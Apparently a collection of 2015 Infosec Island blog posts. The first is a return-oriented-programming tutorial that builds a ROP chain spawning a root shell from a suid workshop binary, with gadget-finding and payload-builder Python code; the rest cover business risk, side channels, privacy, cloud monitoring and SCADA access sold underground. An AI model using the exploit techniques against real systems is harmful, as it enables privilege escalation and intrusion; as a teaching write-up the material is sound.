In the beginning, there were stack buffer overflows everywhere. Overflowing data on the stack made for a quick and easy way to subvert a program into running code provided by an attacker. Initially, this meant simply overwriting the saved return address on the stack with the location of shellcode, typically on the stack and perhaps prefaced by a NOP sled, depending on how accurately the attacker could predict the addresses of data in the corrupted stack.

One of the initial responses to this was to mark stack memory as non-executable (NX), so that an attacker couldn’t simply point EIP at instructions dumped onto the stack. Naturally, as this is a cat-and-mouse game, attackers figured out that they could set up the stack to return into libraries, allowing useful attacker-specified code to run without the need to introduce new instructions. Now, the combination of randomized memory (ASLR) and data execution prevention (DEP) makes it increasingly difficult to exploit a stack overflow on a modern operating system.

The answer to this came in 2007 in one of my favorite technical papers, titled “The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)” by Hovav Shacham. This groundbreaking paper (and subsequent Black Hat 2008 talk) lays out an expansion of return-to-libc exploitation under a new name: Return Oriented Programming (ROP). The basic idea of ROP, like that of its predecessor ret-to-libc, is to chain together instructions in memory marked as executable, using short instruction sequences ending in the x86 ret instruction.

Unlike returning to a library and using existing code as it was (in some ways) intended, ROP takes advantage of unintended code sequences occurring in a program. As described in the paper, the technique works particularly well on x86 architectures due to the lack of instruction alignment and the high-density of the instruction set. The x86 machine code is similar to a page of writing with no punctuation and therefore, can be read to mean any number of things depending on where you start reading.

For example, “To win friends and influence” could be re-read to make new English words, as in “Tow in friend sand influence”. Putting this into the context of machine instructions, a binary may contain the following byte sequence within executable code: “806b891: 8b 15 58 c3 0c 08”. If the CPU starts reading at 0x806b891, it decodes mov edx, [0x80cc358] (opcode 0x8b with ModRM byte 0x15), loading the doubleword at address 0x80cc358 into EDX. Starting to read at 0x806b893 instead, the CPU would interpret the bytes 0x58 and 0xc3 as “pop eax; ret”.

This is a fundamental building block for ROP, also known as a gadget. Research has shown that even simplistic programs with minimal functionality contain enough instructions added by the compiler to create a Turing complete gadget set.
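
You can reproduce this overlapping decoding with the Capstone disassembler (a sketch assuming the capstone Python bindings are installed):

    from capstone import Cs, CS_ARCH_X86, CS_MODE_32

    code = bytes.fromhex("8b1558c30c08")   # the byte sequence from the text
    md = Cs(CS_ARCH_X86, CS_MODE_32)

    for start in (0x806b891, 0x806b893):   # intended vs. misaligned entry point
        print(f"reading from {start:#x}:")
        for insn in md.disasm(code[start - 0x806b891:], start):
            print(f"  {insn.address:#x}: {insn.mnemonic} {insn.op_str}")

Reading from the first address yields the mov; reading two bytes in yields the pop eax; ret gadget.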

The idea is that by searching for the ret opcode (0xC3) within x86 machine code, automated tools can disassemble backwards from that point to generate a list of useful ROP gadgets. For a gadget to be considered useful, it must allow the caller to manipulate registers and memory in a consistent and reliable manner. This means avoiding long sequences with undesirable pointer dereferences or register manipulations. Gadgets with more than four instructions will generally create headaches but can still be used in a pinch. Several tools are freely available for enumerating and classifying useful gadgets from a target binary (for example, http://www.ropshell.com/).
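
A bare-bones version of what those tools do (our sketch, again using Capstone): scan the executable bytes for 0xC3, then try disassembling from a few bytes before each occurrence and keep only the sequences that decode cleanly into the ret:

    from capstone import Cs, CS_ARCH_X86, CS_MODE_32

    def find_gadgets(code: bytes, base: int, depth: int = 8):
        md = Cs(CS_ARCH_X86, CS_MODE_32)
        gadgets = set()
        for ret_off in (i for i, b in enumerate(code) if b == 0xC3):
            for back in range(1, depth + 1):
                start = ret_off - back
                if start < 0:
                    continue
                insns = list(md.disasm(code[start:ret_off + 1], base + start))
                # Keep only if decoding consumed every byte and ends in ret.
                if insns and insns[-1].mnemonic == "ret" \
                        and sum(i.size for i in insns) == back + 1:
                    gadgets.add((base + start,
                                 "; ".join(f"{i.mnemonic} {i.op_str}".strip()
                                           for i in insns)))
        return sorted(gadgets)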

Earlier this month, Bas van den Berg held a ROP primer workshop at BSides London. Unfortunately, I was unable to attend his session, but luckily I did get to chat for a moment with Bas, who was kind enough to give me the VM used in the workshop. This proved to be an interesting way to pass a little extra time sitting in London’s airport while waiting on my rescheduled departure.

I’d now like to share this experience by walking through my quick and dirty approach to creating a ROP chain exploit for the provided vulnerable target.

The program itself (level0 on the VM) is quite simple. Although no source code was provided, it was easy enough to find that user-supplied data from stdin was being copied directly onto a stack buffer without a bounds check. Some sample output follows:

[Screenshot: sample program output]

Providing a longer input string causes an interesting segfault:

[Screenshot: segfault caused by a long input string]

The “A” (0x41) values ended up overwriting the saved return address, causing a SEGFAULT when the CPU tried to fetch an instruction from the bogus address.

The next step in the process is just like traditional stack overflow exploitation, in that we need to identify the offset between the start of the crafted input and the saved return address. This is most easily achieved using a pattern generator similar to the one shown below:

[Screenshot: pattern generator output]
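
That screenshot is not reproduced here; as a stand-in, a generator in the spirit of Metasploit’s pattern_create emits a non-repeating sequence, so that whichever 4 bytes land in EIP map back to a unique offset in the input:

    import string

    def pattern_create(length):
        out = bytearray()
        for upper in string.ascii_uppercase:
            for lower in string.ascii_lowercase:
                for digit in string.digits:
                    out += f"{upper}{lower}{digit}".encode()
                    if len(out) >= length:
                        return bytes(out[:length])
        return bytes(out[:length])

    def pattern_offset(value, length=8192):
        # Where did these 4 bytes (e.g. the faulting EIP) sit in the input?
        return pattern_create(length).find(value)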

We can confirm this as follows:

[Screenshot: segfault at 0xdeadbeef]

The segfault at deadbeef is enough to confirm that we have EIP control, so the next step is to determine how to set up a fake stack so that the program will execute shellcode. As expected (since this is a ROP exercise), the stack is not executable, so we will have to work with executable memory within the program itself.

I started this process by uploading the binary to ropshell.com for quick analysis. A complete analysis of the binary is available at http://ropshell.com/ropsearch?h=6785d72a7337d3ef7367bc9246f88d55. I picked the following gadgets to construct my ROP chain:

[Screenshot: ROP gadgets selected for the chain]

The end goal here is to set up the stack such that I can invoke the execve system call to get a root shell (the challenge binary is suid root). To do this, I will need to arrange some data structures in memory for the system call, load EAX with the execve syscall number (0xb), and then invoke a system call (int 0x80). Setting EAX and triggering the system call are trivial, but creating the argument and environment data structures required for the system call requires a little more creativity.

Before getting into that, however, I think it would be useful to demonstrate how a ROP gadget is consumed. As a simple example, we can set EAX to an arbitrary value, 0x00031337, by crafting input such that the address of ‘pop eax; ret’ will be at EIP, followed by the value we desire for EAX:

[Screenshot: breakpoint hit at the ‘pop eax’ gadget with 0x31337 on top of the stack]

In the above figure, I have prepared a crafted input with a single stage ROP chain and set a breakpoint at the gadget. As you can see (with a little help from the GDB peda addon), control has reached the ‘pop eax’ and the value on the top of the stack is 0x31337 as desired. Stepping into the next instruction shows EAX is in fact loaded as expected:

[Screenshot: EAX loaded with 0x31337 after stepping]

In general, this is how ROP chaining works to create fake stack frames. Each gadget address is specified followed by any stack values needed for execution of the gadget and then, of course, the address of the next gadget in the chain.

While there are many different ways to spawn a shell through ROP, my approach was to pick a predictable address in the program’s data section and use it to arrange the needed data structures. My rw memory starts at 0x080ca660, so I started by loading this address into ECX, then filling a register (I used EAX) with the first 4 bytes of the filename I wanted to execute (/bin), and then moving EAX into the dereferenced address at ECX (my storage area).

This process is repeated, advancing ECX 4 bytes each time, until the complete null-terminated command filename is specified. I then used the next 4 bytes of my memory pool to store the address where the filename is located (this makes up the argument pointer). For the env pointer, I used similar logic. With the command address loaded into EBX, the execve call number in EAX, the argument pointer in ECX, and the envp pointer in EDX, it is now time to call the ‘int 0x80’ gadget to invoke the system call.
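
Putting it all together, the final payload is just padding followed by a byte string of little-endian gadget addresses and operands. A simplified builder (ours; the offset and gadget addresses are placeholders, not the real values from the workshop binary):

    import struct

    p32 = lambda v: struct.pack("<I", v)

    OFFSET = 44                              # assumed; recover it with the pattern above
    SCRATCH = 0x080CA660                     # writable memory in the data section
    # Placeholder gadget addresses -- substitute the ones found for your binary.
    POP_EAX, POP_ECX, MOV_ECX_EAX, INT_80 = 0xDEAD0001, 0xDEAD0002, 0xDEAD0003, 0xDEAD0004

    chain = b"A" * OFFSET                    # padding up to the saved return address
    for i, chunk in enumerate([b"/bin", b"/sh\x00"]):
        chain += p32(POP_ECX) + p32(SCRATCH + 4 * i)   # ecx = write address
        chain += p32(POP_EAX) + chunk                  # eax = 4 bytes of the filename
        chain += p32(MOV_ECX_EAX)                      # *ecx = eax
    # ...additional gadgets load EBX/ECX/EDX for execve("/bin/sh", argv, envp)...
    chain += p32(POP_EAX) + p32(0x0B)        # execve syscall number
    chain += p32(INT_80)                     # int 0x80: invoke the system call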

Exploiting the target now is just a matter of supplying the crafted input and then interacting with the shell it has spawned:

[Screenshot: interacting with the shell spawned by the ROP chain]


This was cross-posted from Tripwire's The State of Security blog.

Enable the Business? Sometimes Security Must Say “NO”…
https://www.infosecisland.com/blogview/24616-Enable-the-Business-Sometimes-Security-Must-Say-NO.html
Thu, 25 Jun 2015 11:13:24 -0500

Business: Saying NO is not an option. Security must enable the business! What is the next best option, apart from your current position of “NO, do NOT do this!!!”?

Security: There are no good options here; we did the analysis several times, and consultants and Gartner GTP analysts confirmed our findings.

Business: Remember that bit about “enabling the digital business”?!! You cannot say “no” – you must deliver us the next best option to enable us.

Security: Well … you can try doing X or Y, with additional safeguards of Z and U implemented.

Business: OK, that’s better! What are the known consequences of using this approach that you are suggesting?

Security: A huge meteor swarm hits Earth, everybody dies.

Business: Uh…OK. Business has the right to accept the risks, right?! Risk accepted.

[Image: meteor hits Earth]

BOOM!!! Everybody dies.

5,000 years pass by…

An alien spaceship finds the now-defunct Earth, lands, and alien archeologists – in a bout of deeply alien curiosity – decide to figure out “what killed Earth?”

[Image: UFO lands on the defunct Earth]

They find a record of the above conversation on a miraculously preserved tablet device, and an argument starts between the aliens: who killed everybody on Earth, SECURITY or BUSINESS?

So, who do you think did? Essentially, there are two camps of … ahem… aliens arguing:

  1. Security is at fault – they did not communicate the risks well enough, or…
  2. Business [government agency] is at fault – they were stupidly negligent and didn’t listen to clear and precise communication, backed up by facts and external experts.

Which one sounds closer to the truth, if there is such a thing here?

Of course, this is not a blog post about the OPM breach. It is a parable about the fine line we have to tread in our daily jobs. As a security technologist you may be asked to do the impossible. While I think optimism is a great belief system, sometimes the impossible is not just very difficult… it is actually friggin’ IMPOSSIBLE. And the so-called “next best option” is that you all friggin’ die!

For example:

  • An enterprise-grade “APT-ready” SOC at $0 … no good options!
  • An in-house run SIEM with no personnel dedicated to it … no good options!
  • Patch as fast as possible – with no automation and fragile legacy systems … no good options!
  • Processing super-secret data on an employee-owned PC on public wifi … no good options!

Conclusion: sometimes, “NO” is the right answer! Well, that and digging a deep enough bunker or moving to a space station before the meteor swarm hits!

This was cross-posted from the Gartner blog.

Researchers Demonstrate Stealing Encryption Keys Via Radio
https://www.infosecisland.com/blogview/24614-Researchers-Demonstrate-Stealing-Encryption-Keys-Via-Radio.html
Wed, 24 Jun 2015 10:54:37 -0500

Researchers at Tel Aviv University have demonstrated a method of stealing encryption keys from a PC using a radio receiver small enough to hide inside a piece of pita bread.

In a paper, the researchers outlined new side-channel attacks on RSA and ElGamal implementations that use the popular sliding window or fixed window modular exponentiation algorithms. The attacks can extract decryption keys using a low measurement bandwidth even when attacking multi-GHz CPUs, the researchers found.

"We demonstrate the extraction of secret decryption keys from laptop computers, by nonintrusively measuring electromagnetic emanations for a few seconds from a distance of 50 cm," the researchers explained in an online summary of the paper. "The attack can be executed using cheap and readily-available equipment: a consumer-grade radio receiver or a Software Defined Radio USB dongle. The setup is compact and can operate untethered; it can be easily concealed, e.g., inside pita bread."

Read the rest of this story on SecurityWeek.com.

Thoughts on the Active Defense Debate
https://www.infosecisland.com/blogview/24613-Thoughts-on-the-Active-Defense-Debate.html
Wed, 24 Jun 2015 10:49:20 -0500

I’d like to take a moment of your time to talk about the hacking-the-hackers debate. I recently read the article “Hack the Hackers? The Debate Rages On”, and the two themes were do it and don’t do it.

Both sides had great points and it almost seemed to me like there was somewhat of an agreement.

It appears to me that on the side opposing an active defense strategy, knowledge is the problem. I am not referring to the knowledge of the individuals and their ability to break into the bad guys’ systems and networks; my takeaway is that knowledge of internal networks, data value, and data location is the real issue.

I also agree that if you don’t know your network, your valuable assets and resources, and where your intellectual property is stored, developing an active defense strategy of hacking back is futile.

There is a mantra among infosec vendors: People, Process, and Technology. I have heard this from nearly every sales rep, director and VP at every company I have worked for, and from every vendor I have worked with, for the past twenty years. It isn’t a bad mantra either.

In fact, it creates a thought process grounded in business problems and how to address them.

It makes sense that if you have a plan that includes a policy and process to defend, detect and respond that you have an advantage. Having a good foundation that goes through a periodic peer review and regular updates to address emerging threats and technology provides the building blocks of a stronger security posture.

The best security practitioners have a plan and in most cases work to build the plan into a process and then this becomes a policy.

Another part of the mantra, technology, is the part that addresses a business problem. This is where the majority of vetting is applied. A problem emerges or rises to the top, research on a solution is started, vendors and professionals gather to offer solutions, more research is conducted, testing occurs on the proposed solutions, and somewhere down the line a decision is made to address the problem.

Often there is a large amount of scrutiny on the technical solution. Features and functions are run through the gamut; the security of the solution is verified, tested and validated by vendors and purchasers; proofs of concept are run; and, based on successful, actionable success criteria, the problem is addressed through a build-or-buy approach.

People (expertise) are the last part of the mantra. Largely, this is an approach to teaching about the technologies that are introduced to solve the business problem being addressed.

This consists of one-on-one knowledge transfers between vendor engineers and customer end users, executive-to-executive solution explanations, presentation delivery, formal training and continued education.

It is part of the process of selling, purchasing and building solutions to real security issues. Solution expertise can be very impactful to an organization or an individual.

It can lead to millions of dollars of savings, a new practice that creates envy in an industry, a strong referenceable security practice and team visibility in an organization where executives can feel secure and proud of the achievements of their team members.

It can also lead to recognition, the development path of a career, certification of knowledge and a cool badge or title on the business card of an individual that displays how hard they have worked to accomplish something of value.

People are, in my opinion, the most important part of the mantra. This also leads back to the discussion of hacking the hackers.

We develop knowledge as we need it. I am going to wager that a large majority of those of us in the InfoSec community studied some form of CompSci at some point. I am also going to wager that though we had some really amazing instructors, professors and mentors, we did a bunch of the learning on our own.

My point is that we are all autodidacts, meaning that we are a population of self-educating professionals. This includes those of us with advanced degrees and education, because in reality, institutions of higher learning cannot teach everything.

We read, research and test technologies in order to have a better understanding, and because what we do is fun and cool. We are at an exciting time where information is at our fingertips and can be obtained from multiple sources at any time from nearly anywhere.

This should give us the drive to learn better methodologies to defend our resources. Sadly, however, it also lends support to the argument against an active defense, hack-the-hacker strategy.

Only a small portion of this community has the deep skill set to stage a response attack. I’m not sure whether that gap comes down to learning priorities, time, fear (of failure or success), interest or comfort level. Maybe it is because of where we are in our careers, or what we have learned that pushed us forward.

The future does look brighter though. Today, children as young as four and five have access to technology learning resources like the Raspberry Pi and entry-level programming tools; IDTech camps (paid camps) provide learning experiences that make technology cool and fun; and there are free resources to educate and expand the minds of today’s youth, thanks in large part to the general technology community.

My hope is that the generation of children being raised today will have both the attack and defense skills to tackle the business problems of now and the future.

Rafal Los (@Wh1t3Rabbit on Twitter), director of solutions research & development at Accuvant, was quoted in CSOOnline’s article saying he “believes if defenders do what attackers have been doing – learning about their adversaries’ tactics, capabilities and tools – they will be more successful…” and “defenders need to know much more about their own environment.”

I believe that he is absolutely correct. However, I also see this as a challenge to organizations to improve their defense. Organizations large and small need to run a better defense and get better at securing their assets; only then should an attack response be considered.

This was cross-posted from the Dark Matters blog. 

Copyright 2010 Respective Author at Infosec Island]]>
Privacy Concerns Changing the Playing Field for Brands https://www.infosecisland.com/blogview/24612-Privacy-Concerns-Changing-the-Playing-Field-for-Brands.html https://www.infosecisland.com/blogview/24612-Privacy-Concerns-Changing-the-Playing-Field-for-Brands.html Wed, 24 Jun 2015 10:45:37 -0500 The competition for consumer attention has led some brands to blur the lines between targeted marketing and privacy violations. Adding to the stress in the relationship between customers and their brands are the ever-present cyber threats targeting private data. New data suggests there are consequences for companies that don’t take their customers’ private information as seriously as the customers do.

In an article posted on CIO magazine, author Tom Kaneshige references a Forrester report with the following statistics:

  • 46 percent of smartphone users have experienced a company taking advantage of their personal data and using it for something other than a previously agreed upon purpose, according to a Loudhouse-Orange survey.
  • Just four spatio-temporal points are enough to uniquely identify 95 percent of individuals, a New York Times article says.
  • A Carnegie Mellon University study found that a person's location has been shared an average of 5,398 times.

Kaneshige emphasizes in the article that consumers show their dissatisfaction with their wallets. He cites Forrester Research, which shows one out of three US adults has canceled a transaction because of privacy concerns.

In a co-webinar with RiskIQ titled ‘Brand Security and the CISO Safeguarding the Company’s Critical Digital Footprint’, Forrester Analyst Nick Hayes discussed a recent study from the Reputation Institute. In most cases a person’s willingness to buy from, work for, and invest in a company is driven by their perception of the company; the products or services the company provides are most often secondary considerations. Forrester also points out that information security and privacy are the top concerns for global business and IT decision makers (for the full Forrester report, go here).

The lines between cyber security and privacy are blurring, if the two were ever truly distinct. This year’s Verizon Data Breach Investigations Report showed that 70% of web app attacks in 2014 were strategic in nature. The true targets weren’t the companies that own the apps, but the patrons who utilize those digital assets. Those attacks were aimed at capturing private data.

Black markets are awash with various sets of private data belonging to individuals, and cyber thieves are monetizing it in many diverse ways. Cyber criminals’ or nation-state actors’ goals range from money-making schemes like affiliate fraud to capturing login credentials that can be used in future breaches.

The problem is that internal security isn’t enough to protect customers. Traditional security best practices dictate strong encryption and defense-in-depth postures, but these strategies leave gaps outside the firewall. Even if good encryption is used and endpoint scanning solutions are in place, many digital assets in web, mobile, and social channels exist outside the walled garden, often leaving them unaccounted for and unguarded.

These threats may or may not be immediately visible to security folks, but they do exist, and they can be impactful. Unusually high rates of cancelled transactions, heightened vigilance on the part of consumers, complaints on social media and the like may all signal security breakdowns occurring outside the firewall.

The key to ensuring safe communications with users is to first understand what exists on the Internet that leads back to the company. This is your organization’s digital footprint: all the web, mobile, social, and rogue assets that exist online and are discoverable by your customers or your adversaries.

Understanding where all those assets are and managing them from one location is critical. By proactively monitoring all apps, landing pages, affiliate sites and the like, teams can defend the security of their brand and limit private data leakage.
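To make that concrete, here is a minimal sketch of the simplest form of outside-the-firewall monitoring: given a list of domains you believe your organization owns, confirm each one still answers over HTTPS and report how close its certificate is to expiry. This is my own illustration in Python, not RiskIQ’s tooling, and the domain names are placeholders.

    # Minimal external-asset check: verify each known domain answers over
    # HTTPS and report certificate expiry. Illustrative sketch only; real
    # digital footprint monitoring also has to discover unknown/rogue assets.
    import socket
    import ssl
    from datetime import datetime, timezone

    DOMAINS = ["www.example.com", "shop.example.com"]  # hypothetical asset list

    def check_cert(domain, port=443, timeout=5.0):
        ctx = ssl.create_default_context()
        try:
            with socket.create_connection((domain, port), timeout=timeout) as sock:
                with ctx.wrap_socket(sock, server_hostname=domain) as tls:
                    cert = tls.getpeercert()
            # 'notAfter' looks like 'Jun 23 12:00:00 2025 GMT'
            expires = datetime.strptime(cert["notAfter"], "%b %d %H:%M:%S %Y %Z")
            days_left = (expires.replace(tzinfo=timezone.utc)
                         - datetime.now(timezone.utc)).days
            print(f"{domain}: certificate OK, {days_left} days until expiry")
        except (OSError, ssl.SSLError) as exc:
            print(f"{domain}: FAILED ({exc})")

    for d in DOMAINS:
        check_cert(d)

Real digital footprint management goes much further (discovering the assets you don’t know about is the hard part), but even a check this small can surface forgotten landing pages before your customers or your adversaries do.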

This was cross-posted from the RiskIQ blog.

Copyright 2010 Respective Author at Infosec Island]]>
Half of All Websites Tested Failed Security and Privacy Assessment https://www.infosecisland.com/blogview/24611-Half-of-All-Websites-Tested-Failed-Security-and-Privacy-Assessment.html https://www.infosecisland.com/blogview/24611-Half-of-All-Websites-Tested-Failed-Security-and-Privacy-Assessment.html Tue, 23 Jun 2015 11:58:57 -0500 Half of the nearly 1000 websites evaluated in the 2015 Online Trust Audit & Honor Roll study conducted by the Online Trust Alliance (OTA) were found to be failing to protect consumers’ personal data and privacy.

News and media websites had the lowest overall scores at an 80% fail rate, and for the third consecutive year Twitter scored highest among all websites tested.

The OTA, a non-profit organization that works to enhance online trust, announced the results of its seventh annual website security audit, grading some of the most popular websites based on dozens of criteria in three main categories: Consumer protection, privacy, and website security.

This year’s audit was expanded to include the websites of the top fifty leading Internet of Things (IoT) device makers, companies which offer wearable technologies and Internet-connected home products, and found that 76% of those websites failed the assessment.

The media and IoT sectors scored poorly primarily due to the lack of adequate privacy policies and substandard domain and email protections to prevent the loss of consumers’ personal and financial information.

“The results of this audit serve as a wake-up call to Internet of Things companies who are handling highly sensitive, dynamic and personal data,” said Craig Spiezle, Executive Director and President of OTA.

“In rushing their products to market without first addressing critical data management and privacy practices, they are putting consumers at risk and inviting regulatory oversight.”

Despite the OTA setting its most difficult criteria yet for this year’s audit, 44% of the websites evaluated across multiple sectors qualified for the organization’s 2015 Honor Roll, a significant improvement over last year’s level of 30%.

Nonetheless, 46% of all websites audited failed completely, and an additional 10% did not perform well enough to earn Honor Roll status. A failure indicates that the website is vulnerable to exploits, does not protect consumers from phishing and social engineering threats, or has insufficient privacy and disclosure policies.

Top scorers in each industry:

  • Banking: USAA Federal Savings Bank
  • Government: Federal Deposit Insurance Corporation (FDIC)
  • Internet of Things: Dropcam
  • News/Media: Bloomberg Businessweek
  • Retail: American Greetings Interactive
  • Social Media: Twitter

Industry Highlights:

  • Retailers: The retail sector saw the largest increase in Honor Roll qualification, from 24% of evaluated websites in 2014 to 42% in 2015
  • Banks: The banking industry also saw a major uptick in Honor Roll qualifications, from 33% of evaluated websites in 2014 to 46% in 2015
  • Social Media: Websites in the social networking category boasted the highest percentage of Honor Roll qualifiers among industries at 58%
  • Government: This sector amassed the highest average privacy score among all evaluated industries, with 42% of government sites making the Honor Roll
  • News: Media websites fared even worse than the IoT sector, with only 8% qualifying for the Honor Roll and 80% failing due to poor email authentication and privacy standards (a quick way to spot-check a domain’s email authentication is sketched after this list)
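Since email authentication comes up repeatedly in the audit results, here is a rough sketch of how a site owner might spot-check their own domain’s posture. It assumes the third-party dnspython package and uses a placeholder domain; OTA’s actual scoring methodology covers far more than this.

    # Quick SPF/DMARC presence check via DNS TXT lookups.
    # Requires the third-party dnspython package (pip install dnspython).
    import dns.resolver

    def txt_records(name):
        try:
            answers = dns.resolver.resolve(name, "TXT")
            return [b"".join(r.strings).decode("utf-8", "replace") for r in answers]
        except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
            return []

    def check_email_auth(domain):
        spf = [r for r in txt_records(domain) if r.startswith("v=spf1")]
        dmarc = [r for r in txt_records("_dmarc." + domain) if r.startswith("v=DMARC1")]
        print(domain + ": SPF " + ("present" if spf else "MISSING")
              + ", DMARC " + ("present" if dmarc else "MISSING"))

    check_email_auth("example.com")  # placeholder domain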

“Our audit and Honor Roll program rewards companies for a commitment to data stewardship, security and privacy policies that protect against cybercrime’s escalating threats,” said Spiezle.

“OTA commends the companies whose dedication to responsible data practices earned them a place on our list. At the same time, it is concerning to see others remain complacent, failing to embrace responsible practices year after year.”

This was cross-posted from the Dark Matters blog.

Copyright 2010 Respective Author at Infosec Island]]>
Trouble In The Cloud?! https://www.infosecisland.com/blogview/24610-Trouble-In-The-Cloud.html https://www.infosecisland.com/blogview/24610-Trouble-In-The-Cloud.html Tue, 23 Jun 2015 11:55:00 -0500 What challenges does the usage of traditional, on-premise security tools [monitoring tools, like SIEM or DLP, in particular] create in the cloud [SaaS, PaaS, IaaS models]?

Here are some I’ve come across (a short sketch illustrating the asset-tracking point follows the list):

  • IaaS
    • IP addresses mean less for tracking all the transient and replaceable instances
    • Rapid provisioning makes assets appear and disappear, go up and down, move in and out of scope, etc.
    • Auto-scaling busts tool licensing limits (!), disrupts node-based asset tracking (“we have 400 assets…ooops…3000…ooops 200 now!”) and creates large volumes of monitoring data for periods of time
    • Remote cloud environments are sometimes accessed via links of limited bandwidth, making it harder to move monitoring data from the cloud to the datacenter
    • Different models for network security monitoring (only at instances, not in between “on the network”)
  • PaaS and SaaS
    • There are layers of the computing stack that are not under enterprise control; no network monitoring, and no host monitoring either (SaaS)
    • No concept of an “asset IP” or, in fact, of a computer as an IT asset
    • For both SaaS and PaaS, lack of any traditional “IT infrastructure” such as an OS
    • No OS logs – “apps all the way down” (SaaS)
    • No perimeter monitoring
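Here is the asset-tracking sketch promised above: a minimal illustration (my own, using boto3 against AWS EC2 as one example; it is not tied to any particular monitoring product) of keying inventory on instance IDs and tags rather than IP addresses, since auto-scaling recycles the latter constantly.

    # Inventory EC2 instances by instance ID and tags instead of IP address.
    # IPs get recycled as auto-scaling adds and removes instances, so they
    # make a poor primary key. Requires boto3 and configured AWS credentials.
    import boto3

    ec2 = boto3.client("ec2")

    inventory = {}
    for page in ec2.get_paginator("describe_instances").paginate():
        for reservation in page["Reservations"]:
            for inst in reservation["Instances"]:
                tags = {t["Key"]: t["Value"] for t in inst.get("Tags", [])}
                inventory[inst["InstanceId"]] = {
                    "state": inst["State"]["Name"],
                    "role": tags.get("Role", "untagged"),
                    # Recorded for reference only; never used as the key.
                    "private_ip": inst.get("PrivateIpAddress"),
                }

    for instance_id, meta in sorted(inventory.items()):
        print(instance_id, meta)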

On top of this, many cloud environments run under a very “alien” (aka DevOps) IT operations model, often dissimilar from traditional data center management models, which further erodes the effectiveness of on-premise security tools.

What other examples of traditional, on-premise security tools not working in the cloud have you seen?

This was cross-posted from the Gartner blog.

Copyright 2010 Respective Author at Infosec Island]]>
We Need a New FUD https://www.infosecisland.com/blogview/24609-We-Need-a-New-FUD.html https://www.infosecisland.com/blogview/24609-We-Need-a-New-FUD.html Tue, 23 Jun 2015 11:51:38 -0500 One of the most common questions I hear debated in infosec (usually rhetorical) is – “what will it take for management to realize how important security is?” I think we’ve all kind of been waiting for that one breach that’s SO bad, or expect that the total volume of breaches and updates from Krebs will reach a tipping point that forces execs and board members to acknowledge that security is critical and pay more attention to it. Folks, I’m not sure it’s going to happen. In fact, I’m willing to argue that “breach weariness” is most certainly never going to be the catalyst for increased investment in security, and really bad/big breaches likely won’t either.

I did a bit of research on some of the top breaches of the last decade, primarily based on the number of records accessed or exposed. A great site to visually see this quickly is “Information is Beautiful”, here. I then went and charted the stock performance of the public companies on the list, and the results may actually surprise you. In short, companies that have experienced breaches are not just overcoming the incident, but thriving. Here are some examples:

Heartland Payments: [stock chart]

TJX Companies: [stock chart]

Adobe Systems: [stock chart]

Global Payments: [stock chart]

Target: [stock chart]
Could this be entirely coincidental? Sure. In fact, what I am NOT asserting is a definitive correlation between breaches and corporate success – although if you had created a stock fund of breached companies, you’d likely have outperformed the market considerably. What I AM suggesting is that we have a bigger problem, and that’s one of credibility at the business level. No one wants to be breached (DUH). There ARE impacts – fines, breach cleanup costs, short-term reputation hits, and so on. Neither security professionals nor executives want to experience any of this. However, business execs will look at companies that have experienced breaches, weathered the storm, and even RALLIED… and they will not be inclined to turn the whole ship toward spending lots of time and money on security initiatives.
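If you want to reproduce the comparison yourself, a minimal sketch follows. It assumes the third-party yfinance package, uses Target’s ticker and its December 2013 disclosure date as the worked example, and is illustration rather than investment analysis.

    # Compare a breached company's stock to the S&P 500 from the disclosure
    # date onward. Requires the third-party yfinance package.
    import yfinance as yf

    TICKER = "TGT"            # Target Corp.
    BENCHMARK = "^GSPC"       # S&P 500 index
    DISCLOSED = "2013-12-19"  # approximate public-disclosure date of the breach

    prices = yf.download([TICKER, BENCHMARK], start=DISCLOSED, end="2015-06-01")["Close"]

    # Normalize both series to 1.0 at the disclosure date so growth is comparable.
    normalized = prices / prices.iloc[0]
    print(normalized.tail())  # values above 1.0 mean the price rose since disclosure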

I think it’s important that we realize that in our little echo chamber, this is the most important issue all the time. To executives and business professionals, this is just another issue to contend with. We need a better business case for security than “we could be breached”. Based on some of the data I am seeing (which, incidentally, many others have delved into better than I have), it’s going to be a hard sell to use breach FUD as a catalyst for change in our security posture.

This was cross-posted from the ShackF00 blog.

Copyright 2010 Respective Author at Infosec Island]]>
SCADA Systems Offered for Sale in the Underground Economy https://www.infosecisland.com/blogview/24608-SCADA-Systems-Offered-for-Sale-in-the-Underground-Economy.html https://www.infosecisland.com/blogview/24608-SCADA-Systems-Offered-for-Sale-in-the-Underground-Economy.html Mon, 22 Jun 2015 11:56:00 -0500 SCADA (Supervisory Control and Data Acquisition) systems are computer systems that control various pieces of real-world equipment. These machines are crucial parts of production lines, power plants and nuclear facilities. They were relatively unknown, even to information security experts, until Stuxnet was detected. Stuxnet, a malware supposedly developed by the United States and Israel, targeted SCADA systems in Iran’s Natanz nuclear facility. By infecting the control systems, the malware was able to spin nuclear fuel enrichment centrifuges out of control and cause major damage to Iran’s nuclear efforts until its detection. Afterwards, SCADA became one of the most talked-about subjects in cyber security. Stuxnet made everyone realize that cyber attacks can have a real-world impact – and because of that, these systems are major targets for attackers.

Now, access to such compromised systems is being sold in the underground economy.

A fraudster has recently posted in several underground forums that he is selling access to SCADA systems. Concerned that many criminals would not understand what was being offered for sale, he started his post with the Wikipedia definition of SCADA. Afterwards, trying to bank on recent news, he noted the systems would be perfect for “duqu 2.0” (a recently discovered malware which was most likely developed by a country to spy on the Iranian nuclear talks).


As the underground is filled with fraudsters who make bogus claims in attempts to rip off interested buyers, the fraudster posted proof that he truly does have access to such systems – a screenshot from a supposedly compromised SCADA system. The screenshot appears to be from a SCADA system in France, which might be part of a hydro-electric generator.


In a closed underground forum, the fraudster also shared three IP addresses and VNC passwords (remote desktop) to three SCADA systems, to further solidify his claims. All three IP addresses are also in France. Two of them are on Orange FR’s IP range and the third is on the IP range of Keyyo.

We haven’t attempted to connect to these systems and cannot validate the information.

So, is this the smoking gun security experts have been waiting for? Are cybercriminals now joining forces with government hackers to take on SCADA systems, potentially causing harm in the real world? Most likely not; a single offering from a single vendor does not constitute a trend. However, assuming the vendor is not making these claims for the purpose of ripping people off, the fact that compromised SCADA systems are now offered for sale for anyone to purchase, including jihadists and hacktivists, should not be taken lightly. Even if it is just one vendor, compromised SCADA systems are currently only a Bitcoin transfer away for anyone with access to these forums. If this turns into a trend, and only time will tell whether it does, vulnerable SCADA systems will become much more available to interested attackers, including ones who are not technically capable.
